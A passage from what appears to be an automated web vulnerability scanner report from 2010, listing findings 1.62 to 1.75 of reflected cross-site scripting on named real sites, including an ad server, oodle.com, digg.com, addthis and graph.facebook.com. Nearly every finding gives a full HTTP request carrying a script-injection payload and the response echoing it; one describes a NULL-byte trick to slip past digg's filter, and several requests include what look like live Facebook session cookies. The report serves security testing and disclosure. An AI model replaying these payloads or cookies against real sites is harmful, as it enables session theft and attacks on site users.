Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=39A06B782483F80303FD7256658FBB26; Path=/
Content-Type: text/javascript
Content-Length: 1461
Date: Fri, 26 Nov 2010 20:48:09 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0&w=300&h=250&ord=395241942ed8'-alert(1)-'b883026bd8b&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$&adsafe_url='+adsafew+'&type='+adsafet+
...[SNIP]...

1.62. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [pli parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The value of the pli request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b53f'-alert(1)-'8da6aa1da61 was submitted in the pli parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=19023264b53f'-alert(1)-'8da6aa1da61&PluID=0&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2852E1A6434EA6C41698204505472C2A; Path=/
Content-Type: text/javascript
Content-Length: 1461
Date: Fri, 26 Nov 2010 20:48:07 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=19023264b53f'-alert(1)-'8da6aa1da61&PluID=0&w=300&h=250&ord=3952419&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$&adsafe
...[SNIP]...

1.63. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [ucm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The value of the ucm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 940af'-alert(1)-'caed2744f52 was submitted in the ucm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0&w=300&h=250&ord=3952419&ucm=true940af'-alert(1)-'caed2744f52&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D71F3A1FA2BE70625EF7DB153BC05BDF; Path=/
Content-Type: text/javascript
Content-Length: 1461
Date: Fri, 26 Nov 2010 20:48:10 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0&w=300&h=250&ord=3952419&ucm=true940af'-alert(1)-'caed2744f52&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$&adsafe_url='+adsafew+'&type='+adsafet+'">
...[SNIP]...

1.64. http://bs.serving-sys.com.47127.9349.302br.net/jss/BurstingPipe/adServer.bs [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com.47127.9349.302br.net
Path:   /jss/BurstingPipe/adServer.bs

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b776'-alert(1)-'0a793856171 was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0&w=3004b776'-alert(1)-'0a793856171&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com.47127.9349.302br.net
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7177602B0001A163BE5AC5B095B0D2A2; Path=/
Content-Type: text/javascript
Content-Length: 1461
Date: Fri, 26 Nov 2010 20:48:08 GMT
Connection: close


var adsafew = "", adsafet = "";

adsafet = 'top.location.href';
   try {
adsafew=encodeURIComponent(top.location.href);
   } catch (adsafeq) {
   }
if (null == adsafew || adsafew.length == 0) {
adsafet
...[SNIP]...
<scr' + 'ipt type="text/javascript" src="http://bs.serving-sys.com.47127.9349.302br.net/fw/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1902326&PluID=0&w=3004b776'-alert(1)-'0a793856171&h=250&ord=3952419&ucm=true&ncu=$$http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5e/3/0/%2a/y%3B231851985%3B0-0%3B0%3B37862604%3B4307-300/250%3B39084416/39102173/1%3B%3B%7Esscs%3D%3f$$&adsafe_url='+adsafew
...[SNIP]...

1.65. http://cars.oodle.com/regions/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cars.oodle.com
Path:   /regions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8271a"-alert(1)-"6e4e879ee95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /regions/?8271a"-alert(1)-"6e4e879ee95=1 HTTP/1.1
Host: cars.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:52:25 GMT
Content-Length: 22950
Connection: close
Set-Cookie: otu=216f76b7a172d795acd2dd4f0659eeac; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=277786c3bca49e4c005d428276173f90; path=/; domain=.oodle.com
Set-Cookie: a=dT1GQUJFQzFBMzRDRjAxRTBB; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODA0NzQ2O30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-nonclassifieds-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-newdomain";
cmSetProduction();
cmCreatePageviewTag("nonclassifieds regions/?8271a"-alert(1)-"6e4e879ee95=1","10000000","","","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-nonclassifieds-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-newdomain");
</script>
...[SNIP]...

1.66. http://digg.com/submit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00ad931"><script>alert(1)</script>1d575234271 was submitted in the REST URL parameter 1. This input was echoed as ad931"><script>alert(1)</script>1d575234271 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00ad931"><script>alert(1)</script>1d575234271 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:41:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1943021764233659329%3A138; expires=Sun, 26-Dec-2010 20:41:13 GMT; path=/; domain=digg.com
Set-Cookie: d=3b30cc627977cd2173aa86583efb5e85fe713731d6c62da283122235337ac2ee; expires=Thu, 26-Nov-2020 06:48:53 GMT; path=/; domain=.digg.com
X-Digg-Time: D=213813 10.2.130.24
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15329

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00ad931"><script>alert(1)</script>1d575234271.rss">
...[SNIP]...

1.67. http://ds.addthis.com/red/psi/sites/www.nypost.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.nypost.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1dcce<script>alert(1)</script>8fc36335893 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.nypost.com/p.json?callback=_ate.ad.hpr1dcce<script>alert(1)</script>8fc36335893&uid=4cb0ff004a7b228e&url=http%3A%2F%2Fwww.nypost.com%2Fp%2Fpagesix%2Fjay_writes_letter_of_recommendation_CNwrClodED5mSnnGp8x1jL&nceyx7 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh28.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; di=%7B%222%22%3A%221618482233066729%2CrnoX2ky07x0ACKAn%22%7D..1290798894.10R|1290723636.60|1290701111.66; dt=X; psc=4; uid=4cb0ff004a7b228e

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 26 Nov 2010 20:48:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 26 Nov 2010 20:48:26 GMT
Connection: close

_ate.ad.hpr1dcce<script>alert(1)</script>8fc36335893({"urls":[],"segments" : [],"loc": "NzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg=="})

1.68. http://forsale.oodle.com/regions/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forsale.oodle.com
Path:   /regions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b1f8"-alert(1)-"73257e21799 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /regions/?5b1f8"-alert(1)-"73257e21799=1 HTTP/1.1
Host: forsale.oodle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html; charset=utf-8
Date: Fri, 26 Nov 2010 20:55:30 GMT
Content-Length: 22721
Connection: close
Set-Cookie: otu=383767212dc280a74a863da5f3602de0; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: ots=55000a2dee5d9759214579489b8faf0d; path=/; domain=.oodle.com
Set-Cookie: a=dT1GMzBCRjFGODRDRjAxRUMz; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: multivariate=YToyOntzOjM6Ind3dyI7czoxMDoid3d3X25vX3NpbCI7czoxMDoiX3RpbWVzdGFtcCI7aToxMjkwODA0OTMxO30%3D; path=/; domain=.oodle.com
Set-Cookie: loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7czoxNzoidXNhOnR4OmNsdXRjaGNpdHkiO3M6NjoicmFkaXVzIjtpOjUwO3M6NzoiY291bnRyeSI7czozOiJVU0EiO3M6OToicmVnaW9uX2lkIjtzOjI6IjE5Ijt9fQ%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com
Set-Cookie: loc_USA_selected=aTowOw%3D%3D; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
nonclassifieds-_-nonclassifieds-_--_-www-_-USA-_-oodle-_-nonclassifieds-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-newdomain";
cmSetProduction();
cmCreatePageviewTag("nonclassifieds regions/?5b1f8"-alert(1)-"73257e21799=1","10000000","","","houston-_-nonclassifieds-_-nonclassifieds-_-www USA-_-www-_-USA-_-oodle-_-nonclassifieds-_--multivariate-partner-www_no_sil--_--_--_--_--_--_-newdomain");
</script>
...[SNIP]...

1.69. http://graph.facebook.com/100001833502192/picture/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /100001833502192/picture/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 991bf<img%20src%3da%20onerror%3dalert(1)>c41e23e615 was submitted in the REST URL parameter 1. This input was echoed as 991bf<img src=a onerror=alert(1)>c41e23e615 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /100001833502192991bf<img%20src%3da%20onerror%3dalert(1)>c41e23e615/picture/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "not_found" "(#803) Some of the aliases you requested do not exist: 100001833502192991bf<img src=a onerror=alert(1)>c41e23e615"
Connection: close
Date: Fri, 26 Nov 2010 20:41:18 GMT
Content-Length: 187

{
"error": {
"type": "OAuthException",
"message": "(#803) Some of the aliases you requested do not exist: 100001833502192991bf<img src=a onerror=alert(1)>c41e23e615"
}
}

1.70. http://graph.facebook.com/100001833502192/picture/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /100001833502192/picture/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b8f9b<script>alert(1)</script>cc89cf21ad5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /100001833502192/pictureb8f9b<script>alert(1)</script>cc89cf21ad5/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 400 Bad Request
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown path components: /pictureb8f9b<script>alert(1)</script>cc89cf21ad5/"
Connection: close
Date: Fri, 26 Nov 2010 20:41:18 GMT
Content-Length: 149

{
"error": {
"type": "OAuthException",
"message": "Unknown path components: /pictureb8f9b<script>alert(1)</script>cc89cf21ad5/"
}
}

1.71. http://graph.facebook.com/100001833502192/picture/ [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /100001833502192/picture/

Issue detail

The value of the type request parameter is copied into the HTML document as plain text between tags. The payload ca8ff<script>alert(1)</script>815bd4131c7 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /100001833502192/picture/?type=squareca8ff<script>alert(1)</script>815bd4131c7 HTTP/1.1
Host: graph.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.oodle.com/?cc5be%22%3E%3Cscript%3Ealert(1)%3C/script%3E54f964f95d1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; lu=ggftxSNqSz1U2scgA_0e4w5A; c_user=100001495440690; sct=1289346776; sid=1; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; wd=295x25

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unsupported type, 'squareca8ff<script>alert(1)</script>815bd4131c7'. Supported types: small, normal, large, square"
X-Cnection: close
Date: Fri, 26 Nov 2010 20:49:16 GMT
Content-Length: 184

{
"error": {
"type": "Exception",
"message": "Unsupported type, 'squareca8ff<script>alert(1)</script>815bd4131c7'. Supported types: small, normal, large, square"
}
}

1.72. http://graph.facebook.com/1530270529/picture/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /1530270529/picture/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8543f<img%20src%3da%20onerror%3dalert(1)>ee45f9fcf54 was submitted in the REST URL parameter 1. This input was echoed as 8543f<img src=a onerror=alert(1)>ee45f9fcf54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /15302705298543f<img%20src%3da%20onerror%3dalert(1)>ee45f9fcf54/picture/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "not_found" "(#803) Some of the aliases you requested do not exist: 15302705298543f<img src=a onerror=alert(1)>ee45f9fcf54"
Connection: close
Date: Fri, 26 Nov 2010 20:41:18 GMT
Content-Length: 183

{
"error": {
"type": "OAuthException",
"message": "(#803) Some of the aliases you requested do not exist: 15302705298543f<img src=a onerror=alert(1)>ee45f9fcf54"
}
}

1.73. http://graph.facebook.com/1530270529/picture/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /1530270529/picture/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a1b57<script>alert(1)</script>d2a58a8d4f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1530270529/picturea1b57<script>alert(1)</script>d2a58a8d4f1/ HTTP/1.1
Host: graph.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=1; sct=1289346776; c_user=100001495440690; datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; lu=ggftxSNqSz1U2scgA_0e4w5A; wd=295x25;

Response

HTTP/1.1 400 Bad Request
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unknown path components: /picturea1b57<script>alert(1)</script>d2a58a8d4f1/"
Connection: close
Date: Fri, 26 Nov 2010 20:41:19 GMT
Content-Length: 149

{
"error": {
"type": "OAuthException",
"message": "Unknown path components: /picturea1b57<script>alert(1)</script>d2a58a8d4f1/"
}
}

1.74. http://graph.facebook.com/1530270529/picture/ [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /1530270529/picture/

Issue detail

The value of the type request parameter is copied into the HTML document as plain text between tags. The payload cb18e<script>alert(1)</script>76414bff0d7 was submitted in the type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1530270529/picture/?type=squarecb18e<script>alert(1)</script>76414bff0d7 HTTP/1.1
Host: graph.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.oodle.com/?cc5be%22%3E%3Cscript%3Ealert(1)%3C/script%3E54f964f95d1=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=1286843309-31cef27f6bfa7f6b1845dc7119ae3cf496eea1caf07cec217f860; lu=ggftxSNqSz1U2scgA_0e4w5A; c_user=100001495440690; sct=1289346776; sid=1; xs=6b19a081ff4a1d488a3cb555d3d9f6ec; wd=295x25

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: no-store
Content-Type: text/javascript; charset=UTF-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
WWW-Authenticate: OAuth "Facebook Platform" "invalid_request" "Unsupported type, 'squarecb18e<script>alert(1)</script>76414bff0d7'. Supported types: small, normal, large, square"
X-Cnection: close
Date: Fri, 26 Nov 2010 20:49:19 GMT
Content-Length: 184

{
"error": {
"type": "Exception",
"message": "Unsupported type, 'squarecb18e<script>alert(1)</script>76414bff0d7'. Supported types: small, normal, large, square"
}
}

1.75. http://graph.facebook.com/21488703512/picture/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /21488703512/picture/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 325bc<img%20src%3da%20onerror%3dalert(1)>b3132b40c0 was submitted in the REST URL parameter 1. This input was echoed as 325bc<img src=a onerror=alert(1)>b3132b40c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

